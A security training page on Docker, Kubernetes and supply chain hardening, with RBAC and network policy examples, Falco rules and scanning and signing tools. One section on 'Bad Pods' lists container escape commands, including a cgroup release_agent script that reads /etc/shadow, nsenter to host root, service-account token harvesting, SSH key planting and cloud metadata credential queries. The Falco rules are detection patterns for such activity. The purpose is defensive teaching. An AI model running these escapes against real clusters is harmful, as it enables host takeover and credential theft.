BT
Privacy ToolboxJournalProjectsResumeBookmarks
Feed
Privacy Toolbox
Journal
Projects
Resume
Bookmarks
Intel
CIPHER
Threat Actors
Privacy Threats
Dashboard
CVEs
Tags
Intel
CIPHERThreat ActorsPrivacy ThreatsDashboardCVEsTags

Intel

  • Feed
  • Threat Actors
  • Privacy Threats
  • Dashboard
  • Privacy Toolbox
  • CVEs

Personal

  • Journal
  • Projects

Resources

  • Subscribe
  • Bookmarks
  • Developers
  • Tags
Cybersecurity News & Analysis
github
defconxt
•
© 2026
•
blacktemple.net
  • Security Patterns
  • Threat Modeling
  • Infrastructure
  • Network Segmentation
  • Identity & Auth
  • Cryptography & PKI
  • Data Protection
  • Supply Chain
  • DNS & Email
  • Containers & K8s
  • AWS Security
  • Azure Security
  • GCP Security
  • Cloud Infrastructure
  • Startup Security
  • Security Patterns
  • Threat Modeling
  • Infrastructure
  • Network Segmentation
  • Identity & Auth
  • Cryptography & PKI
  • Data Protection
  • Supply Chain
  • DNS & Email
  • Containers & K8s
  • AWS Security
  • Azure Security
  • GCP Security
  • Cloud Infrastructure
  • Startup Security
  1. CIPHER
  2. /Architecture
  3. /Container, Kubernetes & Supply Chain Security Deep Dive

Container, Kubernetes & Supply Chain Security Deep Dive

Container, Kubernetes & Supply Chain Security Deep Dive

Training Session: 2026-03-14

Source Material: OWASP Docker/K8s Cheat Sheets, K8s Security Docs, Trivy, kube-bench, kube-hunter, kubesec, Falco, Dockle, SLSA, Cosign, Grype, Syft, Kubernetes Goat, BishopFox Pod Privesc, Harbor, imgcrypt


1. Docker Hardening Controls (OWASP)

Host & Daemon Security

Keep host kernel and Docker Engine current. Container escape CVEs (Leaky Vessels, runc CVE-2024-21626) target outdated runtimes. Patching is the primary mitigation.

Disable TCP daemon socket. Never expose /var/run/docker.sock to containers. If TCP is required, enforce mutual TLS. Socket mount = root on host.

Rootless mode. Run Docker daemon as unprivileged user. Eliminates entire class of privilege escalation from container to host root.

Logging. Set daemon log level to info minimum in /etc/docker/daemon.json. Debug logging exposes sensitive data.

Container Isolation & Privilege Restriction

User enforcement chain (defense in depth):

  1. USER directive in Dockerfile (build time)
  2. -u flag at runtime
  3. --userns-remap=default at daemon level (user namespace remapping)

Capability restriction pattern:

docker run --cap-drop all --cap-add NET_BIND_SERVICE --cap-add CHOWN <image>

Never use --privileged. It grants ALL capabilities + device access + disables seccomp/AppArmor.

Prevent privilege escalation:

docker run --security-opt=no-new-privileges <image>

Blocks setuid/setgid binaries from gaining elevated privileges.

Resource limits (DoS prevention):

docker run --memory=512m --cpus=1.0 --ulimit nofile=1024:2048 \
  --ulimit nproc=256 --restart=on-failure:3 <image>

Filesystem Security

Read-only root filesystem:

docker run --read-only --tmpfs /tmp:rw,noexec,nosuid <image>

Read-only volume mounts:

docker run -v /data:/data:ro <image>

Network Security

Custom networks over default bridge:

docker network create --driver bridge isolated_net
docker run --network=isolated_net <image>

Default docker0 bridge allows inter-container communication. Custom networks provide DNS-based service discovery with isolation.

Image Security

Dockerfile hardening:

  • Pin base image digests: FROM python:3.12-slim@sha256:abc123...
  • Pin OS package versions: apt-get install package=1.2.3-1
  • Use COPY not ADD (ADD auto-extracts archives, fetches URLs)
  • Never curl-pipe-bash in RUN instructions
  • Always specify USER directive
  • Multi-stage builds to minimize attack surface

Secrets management:

# Docker secrets (Swarm mode)
echo "db_password" | docker secret create db_pass -
docker service create --secret db_pass <image>

Never bake secrets into images. Use --secret flag with BuildKit for build-time secrets.

Linux Security Modules

Seccomp: Restrict syscalls. Default profile blocks ~44 dangerous syscalls (mount, reboot, etc.). Custom profiles for tighter control.

AppArmor: Mandatory access controls. Confine file, network, and capability access per container.

SELinux: Label-based mandatory access controls. Use --security-opt label:type:container_t for custom types.


2. Kubernetes RBAC

Architecture

RBAC binds subjects (users, groups, service accounts) to roles (sets of permissions) at namespace or cluster scope.

Enable RBAC:

kube-apiserver --authorization-mode=Node,RBAC

Role Types

Object Scope Binds To
Role Namespace RoleBinding
ClusterRole Cluster-wide ClusterRoleBinding or RoleBinding

Least Privilege Pattern

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: production
  name: pod-reader
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  namespace: production
  name: read-pods
subjects:
- kind: ServiceAccount
  name: monitoring-sa
  namespace: production
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io

RBAC Anti-Patterns (Attack Surface)

  • cluster-admin binding to default service accounts
  • Wildcard verbs (*) or resources (*) in roles
  • escalate, bind, impersonate verbs granted broadly
  • create on pods/deployments + access to secrets = arbitrary code execution with any SA
  • Service account tokens auto-mounted when not needed

RBAC Hardening

  • Disable auto-mount: automountServiceAccountToken: false on ServiceAccount and Pod spec
  • Use short-lived tokens (TokenRequest API) instead of static SA tokens
  • Audit RBAC with kubectl auth can-i --list --as=system:serviceaccount:ns:sa
  • Never bind cluster-admin to application service accounts
  • Use resourceNames to scope to specific resources when possible

3. Kubernetes Network Policies

Default: Allow All

Without NetworkPolicy, all pods can communicate with all other pods across all namespaces. This is the single biggest lateral movement enabler in Kubernetes.

Deny-All Baseline

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress

Apply this to every namespace first, then open specific paths.

Allow Specific Traffic

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-backend
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - protocol: TCP
      port: 8080

Network Policy Limitations

  • Requires a CNI plugin that supports NetworkPolicy (Calico, Cilium, Weave Net -- NOT Flannel)
  • No layer 7 filtering (HTTP methods, paths) without service mesh or Cilium
  • DNS egress must be explicitly allowed (port 53 to kube-dns)
  • No logging of denied connections by default
  • namespaceSelector can reference any namespace -- label namespaces carefully

Egress Control Pattern

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: restrict-egress
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes:
  - Egress
  egress:
  - to:
    - podSelector:
        matchLabels:
          app: database
    ports:
    - protocol: TCP
      port: 5432
  - to:  # Allow DNS
    - namespaceSelector: {}
      podSelector:
        matchLabels:
          k8s-app: kube-dns
    ports:
    - protocol: UDP
      port: 53

4. Pod Security Admission (PSA)

Pod Security Standards (Three Levels)

Level Description Key Restrictions
Privileged Unrestricted None -- allows everything
Baseline Prevents known escalations No hostNetwork, hostPID, hostIPC, privileged containers, hostPath volumes
Restricted Enforces hardening best practices All of Baseline + must run as non-root, drop ALL capabilities, read-only root FS, seccomp profile required

Enforcement Modes

Mode Behavior
enforce Rejects non-compliant pods
audit Allows but logs violations
warn Allows but returns warnings to user

Namespace-Level Configuration

apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted

Restricted Security Context (Full Hardening)

apiVersion: v1
kind: Pod
metadata:
  name: hardened-pod
spec:
  automountServiceAccountToken: false
  securityContext:
    runAsNonRoot: true
    runAsUser: 65534
    runAsGroup: 65534
    fsGroup: 65534
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    image: registry.example.com/app@sha256:abc123
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]
      seccompProfile:
        type: RuntimeDefault
    resources:
      limits:
        memory: "256Mi"
        cpu: "500m"
      requests:
        memory: "128Mi"
        cpu: "250m"
    volumeMounts:
    - name: tmp
      mountPath: /tmp
  volumes:
  - name: tmp
    emptyDir:
      sizeLimit: 100Mi

5. Container Escape Techniques (BishopFox "Bad Pods")

Taxonomy of Pod Privilege Escalation

Eight distinct escalation paths based on which security context fields are misconfigured. Each "Bad Pod" represents a different combination of privileges.

Bad Pod #1: Everything Allowed

Config: privileged: true, hostNetwork: true, hostPID: true, hostIPC: true, hostPath: /

Attack:

  1. Schedule pod on control-plane node via nodeName
  2. chroot /host to gain host root shell
  3. Read etcd secrets directly, harvest SA tokens from kubelet

Impact: Full cluster compromise through multiple paths.

Bad Pod #2: Privileged + HostPID

Config: privileged: true, hostPID: true

Attack:

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

Enters host's PID 1 namespace = root shell on node.

Impact: Full cluster compromise. Without hostPID, nsenter only enters container process namespaces.

Bad Pod #3: Privileged Only

Config: privileged: true

Attack Path A -- Device Mount:

# Find host disk
fdisk -l
# Mount it
mount /dev/sda1 /mnt
# Browse host filesystem
ls /mnt/etc/kubernetes/

Attack Path B -- Cgroup Escape:

# Exploit cgroup user mode helper
# undock.sh or similar cgroup release_agent technique
d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -n1))
mkdir -p $d/w
echo 1 > $d/w/notify_on_release
t=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo $t/cmd > $d/release_agent
echo "#!/bin/sh" > /cmd
echo "cat /etc/shadow > $t/output" >> /cmd
chmod +x /cmd
sh -c "echo 0 > $d/w/cgroup.procs"
sleep 1
cat /output

Impact: Full cluster compromise.

Bad Pod #4: HostPath Only

Config: hostPath: {path: /, type: Directory}

Attack:

  1. Mount entire host filesystem
  2. Search for kubeconfig files: find /host -name kubeconfig
  3. Extract SA tokens: find /host -path "*/serviceaccount/token" -exec cat {} \;
  4. Plant SSH keys: echo $KEY >> /host/root/.ssh/authorized_keys
  5. Read /host/etc/shadow for password cracking

Impact: Full cluster compromise via credential theft.

Bad Pod #5: HostPID Only

Config: hostPID: true

Attack:

# View all host processes and their environment variables
ps auxe | grep -i password
ps auxe | grep -i token
ps auxe | grep -i secret
# Extract credentials from process environments
cat /proc/1/environ | tr '\0' '\n'

Impact: Credential leakage, DoS via process termination.

Bad Pod #6: HostNetwork Only

Config: hostNetwork: true

Attack:

# Sniff traffic on host interfaces
tcpdump -i eth0 -w capture.pcap
# Access localhost-bound services
curl http://localhost:10250/pods  # kubelet API
# Bypass network policies (using host network stack)

Impact: Traffic interception, access to internal services, NetworkPolicy bypass.

Bad Pod #7: HostIPC Only

Config: hostIPC: true

Attack:

# Inspect shared memory
ls -la /dev/shm
ipcs -a
# Read/write shared memory segments from other pods

Impact: Data access from pods using host IPC namespace.

Bad Pod #8: Nothing Allowed (Standard Pod)

Even with no special privileges, attack vectors exist:

  1. Cloud metadata service: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
  2. Overpermissioned default SA: kubectl auth can-i --list from within pod
  3. Anonymous kubelet/API access: if anonymous-auth: true
  4. Kernel/runtime CVEs: unpatched container escape vulnerabilities
  5. Internal service discovery: DNS enumeration + service probing through pod network

Universal Mitigations

  • Enforce PSA restricted level on all namespaces
  • allowPrivilegeEscalation: false and runAsNonRoot: true everywhere
  • Disable SA token auto-mounting: automountServiceAccountToken: false
  • Block cloud metadata: NetworkPolicy denying egress to 169.254.169.254
  • Use admission controllers (OPA Gatekeeper, Kyverno) for custom policy enforcement
  • Monitor pod creation with unusual security contexts via audit logging

6. Kubernetes API Server & etcd Hardening

API Server Authentication (Recommended)

Method Security Level Notes
OIDC with short-lived tokens Strong Preferred for human users
Managed provider IAM (EKS/GKE/AKS) Strong Cloud-native integration
X509 client certs Weak No revocation mechanism
Static token file Dangerous Cleartext CSV, no rotation
Service account tokens Workload-only Never use for human access

etcd Security

etcd write access = cluster root. Treat etcd as the most critical component.

  • Mutual TLS between API server and etcd (client certificates)
  • Isolate etcd behind firewall -- only API servers connect
  • Implement etcd ACLs restricting read/write to required keyspace
  • Encrypt secrets at rest: EncryptionConfiguration with aescbc or aesgcm provider
  • Separate etcd instances for different clusters

Critical Ports to Restrict

Port Service Access
6443 API Server Authenticated clients only
2379-2380 etcd API server only
10250 kubelet API server only
10257 controller-manager Localhost only
10259 scheduler Localhost only
30000-32767 NodePort Restrict per policy

Audit Logging

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
- level: RequestResponse
  resources:
  - group: ""
    resources: ["secrets", "configmaps"]
- level: Metadata
  resources:
  - group: ""
    resources: ["pods", "services"]
- level: Request
  resources:
  - group: "rbac.authorization.k8s.io"
    resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]

Enable with: kube-apiserver --audit-policy-file=/path/to/policy.yaml --audit-log-path=/var/log/k8s-audit.log

Monitor for status: "Forbidden" responses indicating credential abuse or privilege probing.

Admission Controllers

  • ImagePolicyWebhook: Reject images from untrusted registries, unscanned images, disallowed base images
  • Pod Security Admission: Enforce pod security standards per namespace
  • ValidatingAdmissionPolicy (K8s 1.28+): CEL-based declarative validation without webhooks
  • OPA Gatekeeper / Kyverno: Full policy engines for custom admission control

7. Secrets Management in Kubernetes

Problem: K8s Secrets Are Base64, Not Encrypted

kubectl get secret db-creds -o jsonpath='{.data.password}' | base64 -d

By default, secrets are stored as plaintext in etcd.

Hardening Chain

  1. Encrypt at rest: EncryptionConfiguration with KMS provider
  2. Mount as files, not env vars: Environment variables leak via process listing, crash dumps, logs
  3. Read-only mounts: readOnly: true on secret volume mounts
  4. External secret managers: HashiCorp Vault, AWS Secrets Manager, Azure Key Vault with CSI driver
  5. RBAC restriction: Limit get/list/watch on secrets to specific service accounts
  6. Audit logging: Log all secret access at Metadata or Request level
# Mount secret as read-only file
volumes:
- name: db-creds
  secret:
    secretName: db-credentials
    defaultMode: 0400  # Read-only for owner
containers:
- name: app
  volumeMounts:
  - name: db-creds
    mountPath: /etc/secrets
    readOnly: true

8. Runtime Security with Falco

Architecture

Falco intercepts system calls at the kernel level using eBPF (or kernel module), enriches events with container/K8s metadata, and evaluates against a rule engine to produce alerts.

Rule Syntax

- rule: Terminal Shell in Container
  desc: Detect a shell spawned in a container with an attached terminal
  condition: >
    spawned_process and container and
    proc.name in (bash, sh, zsh, dash) and
    proc.tty != 0
  output: >
    Shell spawned in container with attached terminal
    (user=%user.name container_id=%container.id container_name=%container.name
     shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline
     terminal=%proc.tty image=%container.image.repository:%container.image.tag)
  priority: WARNING
  tags: [container, shell, mitre_execution, T1059]

- rule: Read Sensitive File in Container
  desc: Detect reading of sensitive files within containers
  condition: >
    open_read and container and
    fd.name in (/etc/shadow, /etc/passwd, /etc/sudoers)
  output: >
    Sensitive file read in container
    (user=%user.name file=%fd.name container=%container.name
     image=%container.image.repository)
  priority: WARNING
  tags: [container, filesystem, mitre_credential_access, T1003]

- rule: Unexpected Outbound Connection
  desc: Detect outbound network connections from containers to unexpected destinations
  condition: >
    outbound and container and
    not fd.sip in (rfc_1918_addresses) and
    not k8s.ns.name in (kube-system, monitoring)
  output: >
    Unexpected outbound connection from container
    (command=%proc.cmdline connection=%fd.name container=%container.name
     namespace=%k8s.ns.name image=%container.image.repository)
  priority: NOTICE
  tags: [network, mitre_exfiltration, T1041]

- rule: Container Drift - New Executable
  desc: Detect execution of binaries not present in original image
  condition: >
    spawned_process and container and
    not proc.exe in (known_binaries) and
    evt.type = execve
  output: >
    New executable detected in container (not in original image)
    (proc=%proc.name exe=%proc.exe container=%container.name
     image=%container.image.repository)
  priority: ERROR
  tags: [container, mitre_persistence, T1554]

- rule: Mount Detected in Container
  desc: Detect mount/umount operations inside containers
  condition: >
    spawned_process and container and
    proc.name in (mount, umount)
  output: >
    Mount operation in container
    (command=%proc.cmdline container=%container.name
     image=%container.image.repository user=%user.name)
  priority: ERROR
  tags: [container, mitre_privilege_escalation, T1611]

- rule: Privileged Container Started
  desc: Detect when a privileged container is started
  condition: >
    container_started and container.privileged = true
  output: >
    Privileged container started
    (container=%container.name image=%container.image.repository
     namespace=%k8s.ns.name)
  priority: CRITICAL
  tags: [container, mitre_privilege_escalation, T1610]

Deployment Options

  • DaemonSet: Deploy Falco on every node for syscall monitoring
  • Kubernetes Audit Log: Configure API server to send audit events to Falco for API-level detection
  • Falcosidekick: Alert routing to Slack, PagerDuty, Elasticsearch, CloudEvents, webhooks

Output Channels

Syslog, stdout, HTTP endpoints, gRPC services. Integrate with SIEM/SOAR for automated response.

Detection Capabilities

Category Examples
Shell access Interactive shells in containers
File access Sensitive file reads (/etc/shadow, /etc/kubernetes)
Network Unexpected outbound connections, DNS tunneling
Process New binaries, unexpected process trees
Privilege Container escape attempts, mount operations, nsenter
K8s API Unauthorized API calls, secret access, RBAC changes

9. Supply Chain Security

9.1 SBOM Generation with Syft

Software Bill of Materials -- inventory of all components in an artifact. Required for vulnerability management and compliance.

# Generate SBOM from container image
syft alpine:latest -o spdx-json=sbom-spdx.json
syft alpine:latest -o cyclonedx-json=sbom-cdx.json

# Generate from filesystem
syft ./my-project -o syft-json=sbom.json

# Multiple output formats simultaneously
syft <image> -o spdx-json=./spdx.json -o cyclonedx-json=./cdx.json

Supported formats: CycloneDX (JSON/XML), SPDX (JSON), Syft native JSON.

Supported ecosystems: Alpine (apk), Debian (dpkg), RPM, Go modules, Python (pip/poetry), Java (Maven/Gradle), JavaScript (npm/yarn), Ruby (gems), Rust (cargo), PHP (composer), .NET (NuGet).

9.2 Vulnerability Scanning with Grype

# Scan container image
grype alpine:latest

# Scan directory
grype ./my-project

# Scan from SBOM (fastest -- no image pull needed)
grype sbom:./sbom.json

# Scan with severity filtering
grype alpine:latest --only-fixed --fail-on high

Vulnerability prioritization: EPSS (Exploit Prediction Scoring System), KEV (Known Exploited Vulnerabilities), custom risk scoring. OpenVEX support for filtering false positives.

Databases: NVD, GitHub Security Advisories, OS vendor advisories (Alpine, Debian, Ubuntu, RHEL, etc.).

9.3 Vulnerability Scanning with Trivy

# Container image scan
trivy image python:3.4-alpine

# Filesystem scan (vulns + secrets + misconfig)
trivy fs --scanners vuln,secret,misconfig myproject/

# Kubernetes cluster assessment
trivy k8s --report summary cluster

# Generate SBOM
trivy image --format spdx-json -o sbom.json alpine:latest

Scanning capabilities:

  • OS packages and language dependencies (CVEs)
  • IaC misconfigurations (Terraform, CloudFormation, Dockerfile, K8s manifests)
  • Secret detection (API keys, tokens, passwords in code/images)
  • License compliance checking
  • SBOM generation (SPDX, CycloneDX)

CI/CD integration: GitHub Actions (aquasecurity/trivy-action), GitLab CI, Jenkins, CircleCI.

9.4 Container Image Linting with Dockle

# Basic scan
dockle myimage:latest

# JSON output for CI
dockle -f json -o results.json myimage:latest

# Scan saved image
docker save myimage:tag -o image.tar
dockle --input image.tar

Checkpoint categories:

  • CIS Docker Image Checks (11): Base image trust, package management, secrets, user config
  • Dockle Checks (6): Sudo usage, sensitive directory mounting, package manager optimization, tagging
  • Linux System Checks (3): User/group config, password security, unnecessary files

Severity levels: FATAL > WARN > INFO > SKIP > PASS

Comparison with other tools:

Tool Target Focus
Dockle Built images Security auditing
Hadolint Dockerfiles Lint validation
Docker Bench Host/daemon Security audit
Trivy/Grype Images Vulnerability scanning

9.5 Container Signing with Cosign (Sigstore)

Keyless signing (recommended) -- uses OIDC identity + Fulcio CA + Rekor transparency log:

# Sign a container image (keyless -- prompts for OIDC auth)
cosign sign $IMAGE

# Verify with identity constraints
cosign verify $IMAGE \
  --certificate-identity=user@example.com \
  --certificate-oidc-issuer=https://accounts.google.com

# Verify against a public key
cosign verify --key cosign.pub $IMAGE

Key-based signing:

# Generate key pair
cosign generate-key-pair

# Sign with key
cosign sign --key cosign.key $IMAGE

# Verify
cosign verify --key cosign.pub $IMAGE

Attestations (in-toto DSSE):

# Create attestation (e.g., SBOM, SLSA provenance)
cosign attest --predicate sbom.json --key cosign.key $IMAGE_DIGEST

# Verify attestation
cosign verify-attestation --key cosign.pub $IMAGE

Blob signing (non-container artifacts):

cosign sign-blob artifact.tar.gz --bundle artifact.sigstore.json --yes
cosign verify-blob artifact.tar.gz \
  --bundle artifact.sigstore.json \
  --certificate-identity "identity" \
  --certificate-oidc-issuer "issuer-url"

Air-gapped verification: Download images + signatures with network, verify offline using stored TUF roots.

Harbor release verification (real-world example from source):

cosign verify-blob \
  --bundle harbor-offline-installer-v2.15.0.tgz.sigstore.json \
  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
  --certificate-identity-regexp '^https://github.com/goharbor/harbor/.github/workflows/publish_release.yml@refs/tags/v.*$' \
  harbor-offline-installer-v2.15.0.tgz

9.6 SLSA Framework (Supply-chain Levels for Software Artifacts)

Security framework for preventing supply chain tampering. Four build levels with increasing assurance:

Level Name Requirements Threats Addressed
Build L0 No Guarantees None None
Build L1 Provenance Exists Documented build process, provenance generated and distributed Release mistakes, lack of transparency
Build L2 Hosted Build Platform L1 + hosted/dedicated build infra, digitally signed provenance Post-build tampering, insider threats with legal exposure
Build L3 Hardened Builds L2 + isolation between build runs, signing keys inaccessible to build steps During-build tampering, compromised credentials, multi-tenant attacks

Key concept -- Provenance: Machine-readable metadata documenting: who built it, what source it came from, what build platform/process was used, and what dependencies were included.

Three stakeholder concerns:

  • Producers: Protection against tampering and insider threats
  • Consumers: Verification that artifacts are authentic
  • Infrastructure: Build platform hardening and auditability

Achieving SLSA L3 in practice:

  1. Use a hosted CI/CD system (GitHub Actions, Google Cloud Build)
  2. Generate provenance automatically during build
  3. Sign provenance with keyless signing (Sigstore)
  4. Verify provenance at deployment (admission controller)

9.7 Container Image Encryption (imgcrypt)

From the imgcrypt codebase -- a containerd subproject for encrypted container images.

Architecture:

  • Relies on ocicrypt library for cryptographic operations on OCI image layers
  • Integrates with containerd via stream processors that decrypt layers on-the-fly
  • Supports JWE (JSON Web Encryption), PKCS7, and PKCS11 (hardware tokens) encryption schemes

Encryption model:

  • Each image layer is individually encrypted
  • Media types change to indicate encryption: application/vnd.oci.image.layer.v1.tar+gzip+encrypted
  • Manifest is rewritten with encrypted layer descriptors
  • Encryption annotations carry wrapped keys per recipient
  • Multiple recipients supported (each gets their own wrapped copy of the symmetric key)

Containerd stream processor configuration:

[stream_processors."io.containerd.ocicrypt.decoder.v1.tar.gzip"]
    accepts = ["application/vnd.oci.image.layer.v1.tar+gzip+encrypted"]
    returns = "application/vnd.oci.image.layer.v1.tar+gzip"
    path = "/usr/local/bin/ctd-decoder"

Usage workflow:

# Generate keys
openssl genrsa -out mykey.pem
openssl rsa -in mykey.pem -pubout -out mypubkey.pem

# Encrypt image
ctr-enc images encrypt --recipient jwe:mypubkey.pem \
  --platform linux/amd64 docker.io/library/bash:latest bash.enc:latest

# Without key -- access denied
ctr-enc run --rm bash.enc:latest test echo 'Hello'
# Error: "you are not authorized to use this image: missing private key needed for decryption"

# With key -- access granted
ctr-enc run --rm --key mykey.pem bash.enc:latest test echo 'Hello'
# Hello

Security properties:

  • Confidentiality: Image layers encrypted at rest and in transit through untrusted registries
  • Access control: Only holders of private keys can decrypt and run images
  • Key rotation: Re-encrypt with new recipients without re-pulling base content
  • Authorization check: CheckAuthorization() verifies decryption capability without full decryption (unwrap-only mode)

Use cases:

  • Multi-tenant registries where image content must be isolated
  • Compliance requirements for data-at-rest encryption
  • Distributing proprietary images through public/untrusted registries

9.8 Harbor Registry -- Scanning & Signing Workflows

Harbor is a CNCF graduated project that integrates scanning, signing, and SBOM management into a container registry.

Integrated scanning workflow:

  • Built-in Trivy adapter runs as a sidecar service
  • Configurable scan triggers: on push, on schedule (nightly cron), manual
  • Scans OS packages + language libraries with configurable severity levels
  • Results surfaced in UI with CVE details and fix availability
  • Vulnerability allowlisting: Projects can maintain CVE allowlists (with expiration) to bypass blocking on accepted risks
  • Policy enforcement: Block deployment of images above severity threshold

Harbor Trivy adapter configuration (from source):

SCANNER_TRIVY_VULN_TYPE=os,library
SCANNER_TRIVY_SEVERITY=UNKNOWN,LOW,MEDIUM,HIGH,CRITICAL
SCANNER_TRIVY_IGNORE_UNFIXED=false
SCANNER_TRIVY_SECURITY_CHECKS=vuln
SCANNER_TRIVY_OFFLINE_SCAN=false

Nightly scanning pipeline (from Harbor CI):

# Scans all Harbor component images nightly
strategy:
  matrix:
    versions: [dev, v2.12.0-dev]
    images: [harbor-core, harbor-db, harbor-exporter,
             harbor-jobservice, harbor-log, harbor-portal,
             harbor-registryctl, prepare]
# Uses aquasecurity/trivy-action, outputs SARIF to GitHub Security tab

Signing integration:

  • Notary (Docker Content Trust): Legacy signing with trust-on-first-use model
  • Cosign (Sigstore): Keyless signing with transparency log, preferred for new deployments
  • Policy enforcement: Reject unsigned images via admission webhook

SBOM support:

  • Harbor stores SBOMs as OCI artifacts (media type application/vnd.goharbor.harbor.sbom.v1)
  • Single-layer manifest per SBOM, associated with parent image artifact
  • Processor pulls SBOM layer blob on demand for vulnerability correlation

Scan controller interface (from source):

  • Scan() -- trigger scan for artifact with configurable options
  • ScanAll() -- bulk scan with async support
  • GetReport() -- retrieve scan results by mime type
  • GetVulnerable() -- check artifact against CVE allowlist, returns vulnerability count + severity
  • Stop() / StopScanAll() -- cancel running scans

10. CIS Kubernetes Benchmark (kube-bench)

Purpose

Automated checks against CIS Kubernetes Benchmark standards. Validates master node, worker node, etcd, and policy configurations.

Usage

# Run as Kubernetes Job
kubectl apply -f job.yaml
kubectl logs <pod-name>

# Platform-specific jobs available for EKS, GKE, AKS

# Run directly
kube-bench run --targets master,node,etcd,policies

Key Check Categories

  • Master node: API server flags, controller-manager, scheduler configuration
  • Worker node: kubelet configuration, proxy settings
  • etcd: Encryption, authentication, peer communication
  • Policies: RBAC, pod security, network policies, secrets management

Output: PASS/FAIL/WARN per check with remediation guidance.

Modern alternative: Trivy now includes CIS scanning as both CLI and K8s Operator, providing unified vulnerability + compliance scanning.


11. Kubernetes Penetration Testing (kube-hunter)

Capabilities

Attack simulation tool that identifies exploitable vulnerabilities in Kubernetes clusters.

Scanning Modes

# Remote scan (from outside the cluster)
kube-hunter --remote some.cluster.com

# Internal scan (on cluster machine)
kube-hunter --interface

# Pod-based scan (deploy as K8s Job for internal perspective)
kubectl create -f ./job.yaml

# Active mode (attempts exploitation)
kube-hunter --active

# CIDR scanning
kube-hunter --cidr 192.168.0.0/24

# Node auto-discovery via K8s API
kube-hunter --k8s-auto-discover-nodes

Detection Categories

Category Description
Service exposure Open K8s services and ports
Network weaknesses Misconfigured network policies
Authentication gaps Missing/weak authentication
Privilege escalation Elevation opportunities
Container escapes Pod isolation failures

Core Hunter Modules

  • HostDiscovery: IP range generation
  • PortDiscovery: Known K8s service port scanning
  • FromPodHostDiscovery: Subnet discovery from pod context
  • Collector + SendFullReport: Finding aggregation and reporting

12. Kubernetes Resource Security Scoring (kubesec)

Purpose

Static analysis of Kubernetes resource manifests for security misconfigurations.

Usage

# CLI scan
kubesec scan deployment.yaml

# Docker
cat deployment.yaml | docker run -i kubesec/kubesec:v2 scan /dev/stdin

# HTTP API
curl -sSX POST --data-binary @deployment.yaml https://v2.kubesec.io/scan

# As kubectl plugin
kubectl kubesec scan -f deployment.yaml

Scoring

  • Negative scores: Critical security issues (privileged containers, hostPID, etc.)
  • Positive scores: Security best practices (non-root, read-only rootFS, resource limits)
  • Output: JSON with object ID, validity, score, matched rules, and remediation

Integration Points

  • CLI for local development
  • HTTP server for microservice deployment
  • Admission controller for runtime enforcement
  • kubectl plugin for operator workflow

13. Kubernetes Goat -- Vulnerable Lab Scenarios

Interactive security training platform with 22 scenarios covering real-world K8s attack vectors:

Attack Scenarios

# Scenario Category Security Lesson
1 Sensitive Keys in Codebases Secrets Credential exposure in images/repos
2 DIND Exploitation Runtime Container runtime abuse
3 SSRF in Kubernetes Network SSRF targeting internal K8s services
4 Container Escape to Host Isolation Breaking container boundaries
5 Docker CIS Benchmarks Compliance Container security standards
6 Kubernetes CIS Benchmarks Compliance Cluster configuration standards
7 Attacking Private Registry Supply Chain Unauthorized registry access
8 Misconfigured NodePort Exposure Unprotected service exposure
10 Crypto Miner Containers Workload Malicious workload detection
11 Namespace Bypass Isolation Namespace isolation weaknesses
12 Environment Information Recon Metadata extraction techniques
13 DoS Resources Availability Resource exhaustion attacks
15 Hidden in Container Layers Supply Chain Vulnerabilities in image layers
16 RBAC Misconfiguration Access Control Authorization bypass via weak policies
17 KubeAudit Auditing Cluster configuration auditing
18 Falco Runtime Security Detection Behavioral monitoring
19 Popeye Cluster Sanitizer Hygiene Security assessment/validation
20 Network Security Policies Network Communication boundary enforcement
21 Cilium Tetragon eBPF Detection Runtime enforcement with eBPF
22 Kyverno Policy Engine Policy Policy-based hardening

14. Runtime Sandboxing

Options Beyond Standard Containers

Technology Isolation Level Mechanism Syscall Coverage Use Case
gVisor (runsc) Strong User-space kernel ~70% Linux syscalls via ~20 host syscalls Multi-tenant workloads
Kata Containers Very Strong Lightweight VMs Full kernel Untrusted workloads
Firecracker Very Strong microVMs Restricted via seccomp + cgroups Serverless / FaaS
Standard (runc) Namespace/cgroup Shared kernel Full kernel access Trusted workloads

RuntimeClass Configuration

apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
---
apiVersion: v1
kind: Pod
metadata:
  name: sandboxed-pod
spec:
  runtimeClassName: gvisor
  containers:
  - name: app
    image: myapp:latest

Kernel Module Prevention

Blacklist unnecessary kernel modules on K8s nodes:

# /etc/modprobe.d/kubernetes-blacklist.conf
blacklist dccp
blacklist sctp
blacklist rds
blacklist tipc

15. Resource Quotas & Limit Ranges (DoS Prevention)

apiVersion: v1
kind: ResourceQuota
metadata:
  name: compute-resources
  namespace: production
spec:
  hard:
    pods: "20"
    requests.cpu: "4"
    requests.memory: 4Gi
    limits.cpu: "8"
    limits.memory: 8Gi
    persistentvolumeclaims: "10"
---
apiVersion: v1
